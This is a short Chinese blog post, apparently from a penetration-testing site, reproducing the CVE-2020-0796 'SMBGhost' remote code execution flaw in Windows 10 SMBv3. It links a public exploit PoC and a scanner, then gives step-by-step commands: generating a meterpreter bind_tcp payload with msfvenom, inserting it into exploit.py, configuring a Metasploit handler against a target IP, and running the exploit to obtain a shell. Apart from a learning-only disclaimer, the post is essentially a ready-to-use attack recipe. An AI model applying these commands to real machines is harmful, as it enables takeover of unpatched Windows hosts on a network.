CVE-2020-0796微软SMBv3永恒之黑漏洞复现

/ 渗透测试 / 0 条评论 / 1386 浏览

本站的所有程序和文章,仅限用于学习和研究目的;不得用于商业或者非法用途,否则,一切后果请用户自负!!

前言

多的不用说,又是一个内网大杀器。win10用户真香。具体视频,我会在头条号(safe6安全)发布。

工具下载

奇安信的检测工具
http://dl.qianxin.com/skylar6/CVE-2020-0796-Scanner.zip
EXP下载地址
https://github.com/chompie1337/SMBGhost_RCE_PoC

漏洞复现

1、先用以下命令生成payload

msfvenom -p windows/x64/meterpreter/bind_tcp lport=4444 -f python

2、使用生成payload,在exploit.py中用生成的buf替换自己的USER_PAYLOAD

3、msf开启监听

use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp 
set rhost 192.168.0.210
set lport 4444
exploit

4、反弹shell

python3 exploit.py -ip 192.168.0.210

本文最后编辑时间为: 2020-06-07

如本文对你有帮助,点击下面广告支持一下吧,创作不易,感谢大佬。

safe6